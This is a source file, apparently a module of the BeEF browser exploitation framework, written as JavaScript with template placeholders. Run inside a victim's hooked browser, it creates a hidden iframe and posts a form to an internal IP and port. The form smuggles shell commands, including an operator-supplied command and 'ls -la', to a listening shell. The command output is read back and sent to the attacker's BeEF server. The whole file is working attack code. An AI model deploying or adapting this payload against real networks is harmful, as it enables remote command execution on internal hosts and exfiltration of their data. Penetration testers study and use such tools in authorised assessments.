// // Copyright 2011 Wade Alcorn wade@bindshell.net // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // beef.execute(function() { var target_ip = "<%= @ip %>"; var target_port = "<%= @port %>"; var cmd = '<%= @cmd %>'; var command_timeout = "<%= @command_timeout %>"; var internal_counter = 0; // create iframe var iframe = document.createElement("iframe"); iframe.setAttribute("id","ipc_posix_window_<%= @command_id %>"); iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); document.body.appendChild(iframe); // send a request function send_cmds(ip, port, cmd) { var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh&&"; var parent = window.location.href; // create form myform=document.createElement("form"); myform.setAttribute("name","data"); myform.setAttribute("method","post"); myform.setAttribute("enctype","multipart/form-data"); myform.setAttribute("action",action); document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); // post results separator myExt = document.createElement("INPUT"); myExt.setAttribute("id",<%= @command_id %>); myExt.setAttribute("name",<%= @command_id %>); myExt.setAttribute("value","echo \"
\" & " + cmd + " & echo Directory Contents: & ls -la & "); myform.appendChild(myExt); // post js to call home and close connection myExt = document.createElement("INPUT"); myExt.setAttribute("id","endTag"); myExt.setAttribute("name","
"); myExt.setAttribute("value","exit & echo \"__END_OF_POSIX_IPC<%= @command_id %>__window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);\" & exit & exit & exit"); myform.appendChild(myExt); myform.submit(); } // wait seconds for iframe url fragment to match #ipc_result= function waituntilok() { try { if (/#ipc_result=/.test(document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location)) { ipc_result = document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location.href; output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_POSIX_IPC<%= @command_id %>__')); beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); document.body.removeChild(iframe); return; } else throw("command results haven't been returned yet"); } catch (e) { internal_counter++; if (internal_counter > command_timeout) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=time out'); document.body.removeChild(iframe); return; } setTimeout(function() {waituntilok()},1000); } } // validate target if (!target_port || !target_ip || isNaN(target_port)) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port'); } else if (target_port > 65535 || target_port < 0) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); // send request and wait for reply } else { send_cmds(target_ip, target_port, cmd); waituntilok(); } });